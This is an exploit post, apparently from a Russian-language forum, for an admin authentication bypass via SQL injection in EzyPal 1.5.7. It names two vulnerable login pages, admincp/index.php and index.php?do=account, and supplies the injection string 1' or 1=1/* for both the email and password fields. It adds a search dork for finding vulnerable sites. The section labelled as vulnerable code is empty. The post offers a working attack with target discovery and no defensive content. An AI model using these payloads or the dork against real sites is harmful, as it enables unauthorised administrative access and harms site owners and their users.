![]() |
EzyPal <= 1.5.7 Admin Authentication Bypass SQL Injection Exploit
Author: ~!Dok_tOR!~
Product: EzyPal Version: 1.5.7 возможно и более ранние версии URL: www.ezypal.com Vulnerability Class: SQL injection 1. /[installdir]/admincp/index.php Vuln Code: PHP код:
Example: http://[server]/[installdir]/admincp/index.php Email Address: 1' or 1=1/* Password: 1' or 1=1/* 2. Example: http://[server]/[installdir]/index.php?do=account Email Address: 1' or 1=1/* Password: 1' or 1=1/* Dork: Powered by EzyPal Welcome :: EzyPal |
| Время: 19:59 |